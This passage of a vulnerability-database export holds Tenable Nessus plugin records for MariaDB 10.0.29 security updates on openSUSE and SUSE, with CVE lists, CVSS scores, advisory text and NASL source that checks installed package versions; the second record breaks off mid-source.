5.6.34-79.1\n\n - Innodb updated to 5.6.35\n\n - Performance Schema updated to 5.6.35\n\nRelease notes and changelog :\n\n - 
https://kb.askmonty.org/en/mariadb-10029-release-notes\n\n - https://kb.askmonty.org/en/mariadb-10029-changelog\n\nThis update was imported from the SUSE:SLE-12-SP1:Update update\nproject.", "edition": 20, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-02-21T00:00:00", "title": "openSUSE Security Update : mariadb (openSUSE-2017-257)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "modified": "2017-02-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mariadb-errormessages", "p-cpe:/a:novell:opensuse:mariadb-client", "p-cpe:/a:novell:opensuse:libmysqld-devel", "p-cpe:/a:novell:opensuse:mariadb-tools", "p-cpe:/a:novell:opensuse:mariadb-test-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient18", "p-cpe:/a:novell:opensuse:mariadb-bench-debuginfo", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:mariadb-debugsource", "p-cpe:/a:novell:opensuse:libmysqlclient_r18-32bit", "p-cpe:/a:novell:opensuse:mariadb-tools-debuginfo", "p-cpe:/a:novell:opensuse:libmysqld18", "p-cpe:/a:novell:opensuse:libmysqlclient-devel", "p-cpe:/a:novell:opensuse:mariadb-debuginfo", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:libmysqlclient_r18", "p-cpe:/a:novell:opensuse:mariadb-client-debuginfo", "p-cpe:/a:novell:opensuse:libmysqld18-debuginfo", "p-cpe:/a:novell:opensuse:mariadb", "p-cpe:/a:novell:opensuse:mariadb-test", "p-cpe:/a:novell:opensuse:libmysqlclient18-32bit", "p-cpe:/a:novell:opensuse:mariadb-bench", "p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo-32bit"], "id": "OPENSUSE-2017-257.NASL", "href": "https://www.tenable.com/plugins/nessus/97277", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks 
in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-257.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97277);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-6664\", \"CVE-2017-3238\", \"CVE-2017-3243\", \"CVE-2017-3244\", \"CVE-2017-3257\", \"CVE-2017-3258\", \"CVE-2017-3265\", \"CVE-2017-3291\", \"CVE-2017-3312\", \"CVE-2017-3317\", \"CVE-2017-3318\");\n\n script_name(english:\"openSUSE Security Update : mariadb (openSUSE-2017-257)\");\n script_summary(english:\"Check for the openSUSE-2017-257 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This mariadb version update to 10.0.29 fixes the following issues :\n\n - CVE-2017-3318: unspecified vulnerability affecting Error\n Handling (bsc#1020896)\n\n - CVE-2017-3317: unspecified vulnerability affecting\n Logging (bsc#1020894)\n\n - CVE-2017-3312: insecure error log file handling in\n mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873)\n\n - CVE-2017-3291: unrestricted mysqld_safe's ledir\n (bsc#1020884)\n\n - CVE-2017-3265: unsafe chmod/chown use in init script\n (bsc#1020885)\n\n - CVE-2017-3258: unspecified vulnerability in the DDL\n component (bsc#1020875)\n\n - CVE-2017-3257: unspecified vulnerability affecting\n InnoDB (bsc#1020878)\n\n - CVE-2017-3244: unspecified vulnerability affecing the\n DML component (bsc#1020877)\n\n - CVE-2017-3243: unspecified vulnerability affecting the\n Charsets component (bsc#1020891)\n\n - CVE-2017-3238: unspecified vulnerability affecting the\n Optimizer component (bsc#1020882)\n\n - CVE-2016-6664: Root Privilege Escalation (bsc#1008253)\n\n - Applications using the client library for MySQL\n 
(libmysqlclient.so) had a use-after-free issue that\n could cause the applications to crash (bsc#1022428)\n\n - notable changes :\n\n - XtraDB updated to 5.6.34-79.1\n\n - TokuDB updated to 5.6.34-79.1\n\n - Innodb updated to 5.6.35\n\n - Performance Schema updated to 5.6.35\n\nRelease notes and changelog :\n\n - https://kb.askmonty.org/en/mariadb-10029-release-notes\n\n - https://kb.askmonty.org/en/mariadb-10029-changelog\n\nThis update was imported from the SUSE:SLE-12-SP1:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1008253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020868\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020873\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020878\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020884\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020891\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020894\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020896\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1022428\"\n );\n # https://kb.askmonty.org/en/mariadb-10029-changelog\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10029-changelog/\"\n );\n # https://kb.askmonty.org/en/mariadb-10029-release-notes\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10029-release-notes/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mariadb packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-bench-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-errormessages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1|SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1 / 42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqlclient-devel-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqlclient18-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqlclient18-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqlclient_r18-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqld-devel-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqld18-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqld18-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-bench-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-bench-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-client-10.0.29-18.1\") ) 
flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-client-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-debugsource-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-errormessages-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-test-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-test-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-tools-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-tools-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libmysqlclient18-32bit-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-32bit-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libmysqlclient-devel-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libmysqlclient18-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libmysqlclient18-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libmysqlclient_r18-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libmysqld-devel-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libmysqld18-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libmysqld18-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-bench-10.0.29-18.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE42.2\", reference:\"mariadb-bench-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-client-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-client-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-debugsource-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-errormessages-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-test-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-test-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-tools-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"mariadb-tools-debuginfo-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libmysqlclient18-32bit-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.29-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-32bit-10.0.29-18.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-devel / libmysqlclient18 / libmysqlclient18-32bit / etc\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:25:23", "description": "This mariadb version update to 10.0.29 fixes the following issues :\n\n - CVE-2017-3318: unspecified vulnerability affecting Error\n Handling (bsc#1020896)\n\n - CVE-2017-3317: unspecified vulnerability affecting\n 
Logging (bsc#1020894)\n\n - CVE-2017-3312: insecure error log file handling in\n mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873)\n\n - CVE-2017-3291: unrestricted mysqld_safe's ledir\n (bsc#1020884)\n\n - CVE-2017-3265: unsafe chmod/chown use in init script\n (bsc#1020885)\n\n - CVE-2017-3258: unspecified vulnerability in the DDL\n component (bsc#1020875)\n\n - CVE-2017-3257: unspecified vulnerability affecting\n InnoDB (bsc#1020878)\n\n - CVE-2017-3244: unspecified vulnerability affecing the\n DML component (bsc#1020877)\n\n - CVE-2017-3243: unspecified vulnerability affecting the\n Charsets component (bsc#1020891)\n\n - CVE-2017-3238: unspecified vulnerability affecting the\n Optimizer component (bsc#1020882)\n\n - CVE-2016-6664: Root Privilege Escalation (bsc#1008253)\n\n - Applications using the client library for MySQL\n (libmysqlclient.so) had a use-after-free issue that\n could cause the applications to crash (bsc#1022428)\n\n - notable changes :\n\n - XtraDB updated to 5.6.34-79.1\n\n - TokuDB updated to 5.6.34-79.1\n\n - Innodb updated to 5.6.35\n\n - Performance Schema updated to 5.6.35 Release notes and\n changelog :\n\n - https://kb.askmonty.org/en/mariadb-10029-release-notes\n\n - https://kb.askmonty.org/en/mariadb-10029-changelog\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 29, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-02-08T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : mariadb (SUSE-SU-2017:0412-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "modified": "2017-02-08T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:mariadb-errormessages", "p-cpe:/a:novell:suse_linux:mariadb-client-debuginfo", "p-cpe:/a:novell:suse_linux:libmysqlclient_r18", "p-cpe:/a:novell:suse_linux:mariadb-client", "p-cpe:/a:novell:suse_linux:mariadb-debugsource", "p-cpe:/a:novell:suse_linux:libmysqlclient18-debuginfo", "p-cpe:/a:novell:suse_linux:mariadb", "p-cpe:/a:novell:suse_linux:mariadb-debuginfo", "p-cpe:/a:novell:suse_linux:mariadb-tools", "p-cpe:/a:novell:suse_linux:libmysqlclient18", "p-cpe:/a:novell:suse_linux:mariadb-tools-debuginfo"], "id": "SUSE_SU-2017-0412-1.NASL", "href": "https://www.tenable.com/plugins/nessus/97064", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0412-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97064);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-6664\", \"CVE-2017-3238\", \"CVE-2017-3243\", \"CVE-2017-3244\", \"CVE-2017-3257\", \"CVE-2017-3258\", \"CVE-2017-3265\", \"CVE-2017-3291\", \"CVE-2017-3312\", \"CVE-2017-3317\", \"CVE-2017-3318\");\n\n 
script_name(english:\"SUSE SLED12 / SLES12 Security Update : mariadb (SUSE-SU-2017:0412-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This mariadb version update to 10.0.29 fixes the following issues :\n\n - CVE-2017-3318: unspecified vulnerability affecting Error\n Handling (bsc#1020896)\n\n - CVE-2017-3317: unspecified vulnerability affecting\n Logging (bsc#1020894)\n\n - CVE-2017-3312: insecure error log file handling in\n mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873)\n\n - CVE-2017-3291: unrestricted mysqld_safe's ledir\n (bsc#1020884)\n\n - CVE-2017-3265: unsafe chmod/chown use in init script\n (bsc#1020885)\n\n - CVE-2017-3258: unspecified vulnerability in the DDL\n component (bsc#1020875)\n\n - CVE-2017-3257: unspecified vulnerability affecting\n InnoDB (bsc#1020878)\n\n - CVE-2017-3244: unspecified vulnerability affecing the\n DML component (bsc#1020877)\n\n - CVE-2017-3243: unspecified vulnerability affecting the\n Charsets component (bsc#1020891)\n\n - CVE-2017-3238: unspecified vulnerability affecting the\n Optimizer component (bsc#1020882)\n\n - CVE-2016-6664: Root Privilege Escalation (bsc#1008253)\n\n - Applications using the client library for MySQL\n (libmysqlclient.so) had a use-after-free issue that\n could cause the applications to crash (bsc#1022428)\n\n - notable changes :\n\n - XtraDB updated to 5.6.34-79.1\n\n - TokuDB updated to 5.6.34-79.1\n\n - Innodb updated to 5.6.35\n\n - Performance Schema updated to 5.6.35 Release notes and\n changelog :\n\n - https://kb.askmonty.org/en/mariadb-10029-release-notes\n\n - https://kb.askmonty.org/en/mariadb-10029-changelog\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1008253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020868\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020873\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020878\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020884\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020891\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020894\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020896\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022428\"\n );\n # https://kb.askmonty.org/en/mariadb-10029-changelog\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10029-changelog/\"\n );\n # https://kb.askmonty.org/en/mariadb-10029-release-notes\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://mariadb.com/kb/en/library/mariadb-10029-release-notes/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6664/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3238/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3243/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3244/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3257/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3258/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3265/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3291/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3312/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3317/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3318/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170412-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?14c3ceff\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP2:zypper in -t patch\nSUSE-SLE-WE-12-SP2-2017-207=1\n\nSUSE Linux Enterprise Workstation Extension 12-SP1:zypper in -t patch\nSUSE-SLE-WE-12-SP1-2017-207=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in 
-t\npatch SUSE-SLE-SDK-12-SP2-2017-207=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP1:zypper in -t\npatch SUSE-SLE-SDK-12-SP1-2017-207=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-207=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-207=1\n\nSUSE Linux Enterprise Server 12-SP1:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-207=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-207=1\n\nSUSE Linux Enterprise Desktop 12-SP1:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP1-2017-207=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysqlclient18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysqlclient18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysqlclient_r18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-debuginfo\");\n 
